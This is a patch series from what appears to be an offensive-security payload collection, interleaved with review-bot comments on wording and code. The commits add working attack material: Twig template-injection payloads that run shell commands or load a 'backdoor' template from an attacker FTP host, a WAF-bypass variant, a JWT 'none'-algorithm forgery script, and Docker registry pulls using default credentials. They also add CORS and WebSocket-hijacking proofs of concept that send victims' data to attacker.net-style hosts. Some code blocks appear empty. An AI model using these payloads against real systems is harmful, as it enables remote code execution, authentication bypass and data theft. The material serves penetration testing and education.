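Review bot: several commands in the new `Container - Docker Pentest.md` will not paste correctly: `–unix-socket` (second and third lines of the Mounted Docker Socket block) and `–insecure` (Open Docker API Port block) use an en dash instead of `--`, `https://tls-opendocker.socket2376/containers/create` is missing the `:` before the port, and in the Insecure Docker Registry block the image-name placeholders were stripped, leaving `/v2//tags/list` and `docker pull https://registry.example.com:443/:` (`docker pull` also takes no scheme prefix). Every shell snippet in the file is fenced as `powershell`; `Socker mounted as volume` and `Docker runned with` should read `Socket mounted as a volume` and `Docker started with`. In the cgroup section, the one-liner that pipes a base64 blob into `bash` is opaque to readers and the step-by-step breakdown beneath it is the same procedure, so keep only the readable version. Each section lists its prerequisite flag (`--privileged`, `SYS_ADMIN`, the mounted socket, `-H tcp://0.0.0.0`); stating the corresponding mitigation once at the top (do not grant those to untrusted workloads, never expose the API without TLS and client auth) would make the file useful for hardening as well.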
@@ -434,7 +434,7 @@ Tool: [wildpwn](https://github.com/localh0t/wildpwn) List world writable files on the system. ```powershell -find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null +find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null find / -perm -2 -type f 2>/dev/null find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null ``` @@ -696,4 +696,4 @@ https://www.exploit-db.com/exploits/18411 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) -* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) \ No newline at end of file +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) From 268d85b4bf8ee0553691f035ca11f06aea8f4fda Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 29 Mar 2020 22:34:26 +0200 Subject: [PATCH 09/85] Symfony SSTI Twig RCE --- Server Side Template Injection/README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 79c2a9f..0f780ee 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
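Review bot: dropping the backslashes is correct, since Markdown does not interpret backticks inside a fenced block and `\`whoami\`` would have passed a literal backslash to `find`. While touching the line, `$(whoami)` is the more readable and nest-safe form of command substitution and would avoid the confusion that prompted this fix.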
@@ -17,6 +17,7 @@ * [Twig](#twig) * [Basic injection](#basic-injection) * [Template format](#template-format) + * [Arbitrary File Reading](#arbitrary-file-reading) * [Code execution](#code-execution) * [Smarty](#smarty) * [Freemarker](#freemarker) @@ -126,6 +127,8 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex ```python {{7*7}} {{7*'7'}} would result in 49 +{{dump(app)}} +{{app.request.server.all|join(',')}} ``` ### Template format @@ -142,6 +145,12 @@ $output = $twig > render ( ); ``` +### Arbitrary File Reading + +```python +"{{'/etc/passwd'|file_excerpt(1,30)}}"@ +``` + ### Code execution ```python @@ -150,6 +159,13 @@ $output = $twig > render ( {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} ``` +Example with an email passing FILTER_VALIDATE_EMAIL PHP. + +```powershell +POST /subscribe?0=cat+/etc/passwd HTTP/1.1 +email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld +``` + ## Smarty ```python From 8b78c2fe71e7eebe7548f20eb2348c1151a870e1 Mon Sep 17 00:00:00 2001 From: SakiiR SakiiR Date: Sun, 29 Mar 2020 23:19:27 +0200 Subject: [PATCH 10/85] Added filter(system) twig RCE --- Server Side Template Injection/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 0f780ee..9bf3241 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -157,6 +157,8 @@ $output = $twig > render ( {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} ``` Example with an email passing FILTER_VALIDATE_EMAIL PHP. From 38c273ff00da234058b477275826323af3429a58 Mon Sep 17 00:00:00 2001 
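Review bot: the `### Arbitrary File Reading` payload `"{{'/etc/passwd'|file_excerpt(1,30)}}"@` ends with a dangling `"@` and no domain: the `"..."@host` wrapper is the email-shaped form that the `FILTER_VALIDATE_EMAIL` example three hunks later introduces, but a reader meets it here first with no explanation. Either drop the wrapper in this section or complete it and say what it is for. `file_excerpt` is a Symfony Twig-bridge (`CodeExtension`) filter rather than core Twig, which the section should state since it decides where the payload applies, and all the Twig blocks are fenced as `python`, which is misleading. The added sentence `Example with an email passing FILTER_VALIDATE_EMAIL PHP.` reads better as `Example with a payload that passes PHP's FILTER_VALIDATE_EMAIL check.`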
From: SakiiR SakiiR Date: Sun, 29 Mar 2020 23:23:26 +0200 Subject: [PATCH 11/85] Added IFS (WAF bypass) to Symfony Twig RCE --- Server Side Template Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 9bf3241..9fc9ac5 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -159,6 +159,7 @@ $output = $twig > render ( {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{['id']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} ``` Example with an email passing FILTER_VALIDATE_EMAIL PHP. From 009a2f92768e1f2c0c6bc5c4da8f5044b04f0bb7 Mon Sep 17 00:00:00 2001 From: "fuxsocy.py" <0x0byte@protonmail.com> Date: Fri, 3 Apr 2020 23:15:05 +0000 Subject: [PATCH 12/85] Update SQLite Injection.md Added new link location for the pdf. --- SQL Injection/SQLite Injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 428e806..dcece85 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -88,4 +88,4 @@ Note: By default this component is disabled ## References -[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf) +[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf) From c9fcb58d57f1097a2351f713413627752f7d88df Mon Sep 17 00:00:00 2001 
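Review bot: the added `{{['cat$IFS/etc/passwd']|filter('system')}}` line documents its purpose only in the commit message; the file should say it is the `$IFS` variant of the line above it (the commit message calls it a WAF bypass) rather than leaving three near-identical payloads unexplained.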
From: Syed Umar Arfeen <18597330+Anon-Exploiter@users.noreply.github.com> Date: Sat, 4 Apr 2020 16:03:56 +0500 Subject: [PATCH 13/85] Using JWT's module to encode payload with type `None` Before the JWT was being encoded/decoded and that was done manually. The JWT's module does all that without manual decoding and splitting. This PR contains the code to encode the JWT token with type None while using JWT's library in python. --- JSON Web Token/README.md | 38 +++++++++++++------------------------- 1 file changed, 13 insertions(+), 25 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index a6fb080..c4063d8 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md 
@@ -100,37 +100,25 @@ To exploit this vulnerability, you just need to decode the JWT and change the al However, this won't work unless you **remove** the signature -The following code is a basic test for a None algorithm. - -```python -import jwt -import base64 - -def b64urlencode(data): - return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '') - -print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \ - '.' + b64urlencode("{\"data\":\"test\"}") + '.' -``` - Alternatively you can modify an existing JWT (be careful with the expiration time) -```python -#!/usr/bin/python +```python3 +#!/usr/bin/python3 # -*- coding: utf-8 -*- -jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ" -header, payload, signature = jwt.split('.') +import jwt -# Replacing the ALGO and the payload username -header = header.decode('base64').replace('HS256',"none") -payload = (payload+"==").decode('base64').replace('test','admin') +jwtToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ' -header = header.encode('base64').strip().replace("=","") -payload = payload.encode('base64').strip().replace("=","") +decodedToken = jwt.decode(jwtToken, verify=False) # Need to decode the token before encoding with type 'None' +noneEncoded = jwt.encode(decodedToken, key='', algorithm=None) -# 'The algorithm 'none' is not supported' -print( header+"."+payload+".") +print(noneEncoded.decode()) + +""" +Output: +eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0. +""" ``` ## JWT Signature - RS256 to HS256 
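Review bot: `jwt.decode(jwtToken, verify=False)` and `print(noneEncoded.decode())` tie the snippet to PyJWT 1.x: the `verify=` keyword is deprecated there and removed in PyJWT 2.0 (use `options={"verify_signature": False}` instead), and 2.x `encode()` returns `str`, so `.decode()` raises `AttributeError`. Passing `algorithm="none"` explicitly instead of `None` also makes the intent obvious to a reader. The fence tag `python3` is not recognised by most highlighters; `python` is the usual tag, and the `#!/usr/bin/python3` shebang already documents the interpreter.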
@@ -290,4 +278,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) -- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) \ No newline at end of file +- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) From 6e7af5a267bb07e18e06a071a0c8a52c6d210bfa Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 4 Apr 2020 18:27:41 +0200 Subject: [PATCH 14/85] Docker Registry - Pull/Download --- .../Container - Docker Pentest.md | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md index c4682cf..26ca5d9 100644 --- a/Methodology and Resources/Container - Docker Pentest.md +++ b/Methodology and Resources/Container - Docker Pentest.md 
@@ -70,6 +70,24 @@ Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. The ```powershell curl https://registry.example.com/v2//tags/list docker pull https://registry.example.com:443/: + +# connect to the endpoint and list image blobs +curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest +# download blobs +curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz +# automated download +https://github.com/NotSoSecure/docker_fetch/ +python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local +``` + +Access a private registry and start a container with one of its image + +```powershell +docker login -u admin -p admin docker.registry.local +docker pull docker.registry.local/wordpress-image +docker run -it docker.registry.local/wordpress-image /bin/bash ``` Access a private registry using OAuth Token from Google @@ -80,7 +98,6 @@ curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service docker login -e -u oauth2accesstoken -p "" https://gcr.io ``` - ## Exploit privileged container abusing the Linux cgroup v1 Prerequisite (at least one): From cea982c062fede36bdd01dc3a185d39192720462 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 4 Apr 2020 22:33:28 +0200 Subject: [PATCH 15/85] GraphQL Voyager - Represent any GraphQL API as an interactive graph --- GraphQL Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 3719113..725bee0 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md 
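Review bot: the bare `https://github.com/NotSoSecure/docker_fetch/` line sits inside the `powershell` fence as if it were a command; prefix it with `#` so it cannot be pasted into a shell. The same block mixes `https://docker.registry.local` for the catalog and manifest calls with `http://docker.registry.local` for the blob download, which looks like a typo. `-k` disables certificate validation on requests that carry credentials; a comment that it is only for lab registries with self-signed certificates would stop readers copying it against real ones.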
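Review bot: `docker login -u admin -p admin docker.registry.local` puts the password on the command line, where it lands in shell history and `ps` output; Docker warns about this itself and supports `--password-stdin`, e.g. `echo "$REGISTRY_PASS" | docker login -u admin --password-stdin docker.registry.local`. The heading also needs `one of its images`.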
@@ -22,6 +22,7 @@ ## Tools * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap) +* [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/) * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/) * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide) * [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql) From 5902da38e4440ba097a9264f5f30327799296c16 Mon Sep 17 00:00:00 2001 From: Techbrunch Date: Wed, 8 Apr 2020 19:14:30 +0200 Subject: [PATCH 16/85] Create web.web.config Source: https://gist.github.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c --- .../web.web.config | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 Upload Insecure Files/Configuration IIS web.config/web.web.config diff --git a/Upload Insecure Files/Configuration IIS web.config/web.web.config b/Upload Insecure Files/Configuration IIS web.config/web.web.config new file mode 100644 index 0000000..6e02a37 --- /dev/null +++ b/Upload Insecure Files/Configuration IIS web.config/web.web.config @@ -0,0 +1,65 @@ + + + + + + + + + + + + + + + + + + + From 930a3a0d8c75c2964ac1d6f74efc319ed6900a2b Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Sat, 11 Apr 2020 16:17:35 +0200 Subject: [PATCH 17/85] Added: Cross-Site WebSocket Hijacking (CSWSH) --- Web Sockets/README.md | 29 ++++++++++++++++++++++++++++- 1 file changed, 28 insertions(+), 1 deletion(-) diff --git a/Web Sockets/README.md b/Web Sockets/README.md index b53a7b7..c63bdd4 100644 --- a/Web Sockets/README.md +++ b/Web Sockets/README.md 
@@ -31,9 +31,36 @@ Then you can use any tools against the newly created web service, working as a p sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump ``` +## Cross-Site WebSocket Hijacking (CSWSH) + +If the WebSocket handshake is not correctly protected using a CSRF token or a +nonce, it's possible to use the authenticated WebSocket of a user on an +attacker's controlled site because the cookies are automatically sent by the +browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH). + +Example exploit, hosted on an attacker's server, that exfiltrates the received +data from the WebSocket to the attacker: + +```html + +``` + +You have to adjust the code to your exact situation. E.g. if your web +application uses a `Sec-WebSocket-Protocol` header in the handshake request, +you have to add this value as a 2nd parameter to the `WebSocket` function call +in order to add this header. ## References - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf) -- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#) \ No newline at end of file +- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#) From 4537555714b73de67342aa035f5af44060cb0175 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Sun, 12 Apr 2020 14:29:10 +0200 Subject: [PATCH 18/85] Added: CORS Misconfiguration with Null Origin allowed --- CORS Misconfiguration/README.md | 223 +++++++++++++++++++------------- 1 file changed, 133 insertions(+), 90 deletions(-) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index dcf5bfc..98f3573 100644 
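Review bot: the new CSWSH section describes the attack but never states the defence, and the opening sentence mentions only CSRF tokens and nonces: browsers always send an `Origin` header on the WebSocket opening handshake, so validating that header against an allow-list on the server is the standard fix and is also the precise reason the attack works when it is missing. One sentence on that belongs in the section. Minor wording: `an attacker's controlled site` should be `an attacker-controlled site`, and `in order to add this header` reads better as `to set this header`.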
--- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -1,90 +1,133 @@ -# CORS Misconfiguration - -> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. - -## Summary - -* [Prerequisites](#prerequisites) -* [Exploitation](#exploitation) -* [References](#references) - -## Prerequisites - -* BURP HEADER> `Origin: https://evil.com` -* VICTIM HEADER> `Access-Control-Allow-Credential: true` -* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` - -## Exploitation - -Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. - -### Vulnerable example - -```powershell -GET /endpoint HTTP/1.1 -Host: victim.example.com -Origin: https://evil.com -Cookie: sessionid=... - -HTTP/1.1 200 OK -Access-Control-Allow-Origin: https://evil.com -Access-Control-Allow-Credentials: true - -{"[private API key]"} -``` - -### Proof of concept - -```js -var req = new XMLHttpRequest(); -req.onload = reqListener; -req.open('get','https://victim.example.com/endpoint',true); -req.withCredentials = true; -req.send(); - -function reqListener() { - location='//atttacker.net/log?key='+this.responseText; -}; -``` - -or - -```html - - -

CORS PoC

-
- -
- - - -``` - -## Bug Bounty reports - -* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) -* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) -* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) -* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) -* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) - -## References - -* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) -* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) -* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) -* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) \ No newline at end of file +# CORS Misconfiguration + +> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. 
+ +## Summary + +* [Prerequisites](#prerequisites) +* [Exploitation](#exploitation) +* [References](#references) + +## Prerequisites + +* BURP HEADER> `Origin: https://evil.com` +* VICTIM HEADER> `Access-Control-Allow-Credential: true` +* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null` + +## Exploitation + +Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. + +### Vulnerable Example: Origin Reflection + +#### Vulnerable Implementation + +```powershell +GET /endpoint HTTP/1.1 +Host: victim.example.com +Origin: https://evil.com +Cookie: sessionid=... + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: https://evil.com +Access-Control-Allow-Credentials: true + +{"[private API key]"} +``` + +#### Proof of concept + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://victim.example.com/endpoint',true); +req.withCredentials = true; +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + +or + +```html + + +

CORS PoC

+
+ +
+ + + +``` + +### Vulnerable Example: Null Origin + +#### Vulnerable Implementation + +It's possible that the server does not reflect the complete `Origin` header but +that the `null` origin is allowed. This would look like this in the server's +response: + +``` +GET /endpoint HTTP/1.1 +Host: victim.example.com +Origin: null +Cookie: sessionid=... + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: null +Access-Control-Allow-Credentials: true + +{"[private API key]"} +``` + +#### Proof of concept + +This can be exploited by putting the attack code into an iframe using the data +URI scheme. If the data URI scheme is used, the browser will use the `null` +origin in the request: + +```html + +``` + +## Bug Bounty reports + +* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) +* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) +* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) +* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) +* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) + +## References + +* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) +* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) +* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) +* [Advanced CORS Exploitation Techniques - Corben Leo - June 
16, 2018](https://www.corben.io/advanced-cors-techniques/) From 48fcdeb7ca83c147d09734b5ad28bc48d6dd4b2f Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Sun, 12 Apr 2020 14:38:52 +0200 Subject: [PATCH 19/85] Some clarification in the exploit code --- CORS Misconfiguration/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 98f3573..d224ea5 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -112,7 +112,7 @@ origin in the request: req.send(); function reqListener() { - location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText); + location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText); }; "> ``` From f120024c6b6d768a365cdcc7cf9d4a47f9c9d6b9 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Sun, 12 Apr 2020 14:55:05 +0200 Subject: [PATCH 20/85] Added CORS exploitation with strict trusted origin whitelist using XSS --- CORS Misconfiguration/README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index d224ea5..d7d9f95 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -117,6 +117,17 @@ origin in the request: "> ``` +### Vulnerable Example: XSS on Trusted Origin + +If the application does implement a strict whitelist of allowed origins, the +exploit codes from above do not work. But if you have an XSS on a trusted +origin, you can inject the exploit coded from above in order to exploit CORS +again. + +``` +https://trusted-origin.example.com/?xss= +``` + ## Bug Bounty reports * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) From 3e5b36722418cba19b02abd751ab08160dcb43e5 Mon Sep 17 00:00:00 2001 
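Review bot: nearly every line of `CORS Misconfiguration/README.md` is shown as removed and re-added unchanged (title, quote, Summary, both original PoCs), which buries the actual change (the `OR Access-Control-Allow-Origin: null` bullet and the `Null Origin` section); that pattern usually means a line-ending or trailing-whitespace change, so re-save with the file's original line endings to get a reviewable diff. Two errors carried over from the old text should be fixed while the file is being touched: the prerequisite header `Access-Control-Allow-Credential: true` is missing its final `s` (`Access-Control-Allow-Credentials`), and the PoC host `//atttacker.net` has three `t`s. The first request/response block is fenced `powershell` and the null-origin one has no tag; `http` fits both.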
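Review bot: replacing `$exploit-server-url` with `https://attacker.example.net` is the right call, but the other PoCs in the same file still exfiltrate to `//atttacker.net`; use the same reserved `.example` placeholder everywhere so nobody copies a real-looking domain into a test.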
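Review bot: grammar in the `XSS on Trusted Origin` paragraph: `does implement` should be `implements`, `the exploit codes from above` should be `the exploit code from above`, and `inject the exploit coded from above` should be `inject the exploit code from above`. The example URL ends at `https://trusted-origin.example.com/?xss=` with nothing after the `=`; make the placeholder explicit (e.g. `<PoC script from the Origin Reflection section>`) and give the fence a language tag, since an empty parameter shows the reader nothing.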
From: Emanuel Duss Date: Sun, 12 Apr 2020 15:06:28 +0200 Subject: [PATCH 21/85] Added CORS Exploit when wildcard origin is allowed --- CORS Misconfiguration/README.md | 35 +++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index d7d9f95..8d9af8b 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -128,6 +128,41 @@ again. https://trusted-origin.example.com/?xss= ``` +### Vulnerable Example: Wildcard Origin `*` without Credentials + +If the server responds with a wildcard origin `*`, the browser does never send +the cookies. Howver, if the server does not require authentication, it's still +possible to access the data on the server. This can happen on internal servers +that are not accessible from the Internet. The attacker's website can then +pivot into the internal network and access the server's data withotu +authentication. + +#### Vulnerable Implementation + +```powershell +GET /endpoint HTTP/1.1 +Host: api.internal.example.com +Origin: https://evil.com + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: * + +{"[private API key]"} +``` + +#### Proof of concept + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://api.internal.example.com/endpoint',true); +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + ## Bug Bounty reports * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) From 54e388707707d12760968b449f0b94cd27865c67 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Sun, 12 Apr 2020 15:12:34 +0200 Subject: [PATCH 22/85] Added PortSwigger Web Security Academy CORS Link --- CORS Misconfiguration/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 8d9af8b..7d4d715 100644 
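Review bot: the explanation in the `Wildcard Origin` section is imprecise: with `Access-Control-Allow-Origin: *` the browser can still send cookies on a simple request made with `withCredentials`, but it refuses to expose the response to a credentialed request, so the accurate statement is that only data the server hands out without authentication can be read. Rephrase `the browser does never send the cookies` along those lines. Typos: `Howver` should be `However` and `withotu` should be `without`. The PoC again logs to `//atttacker.net`; use the `https://attacker.example.net` placeholder from the null-origin PoC.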
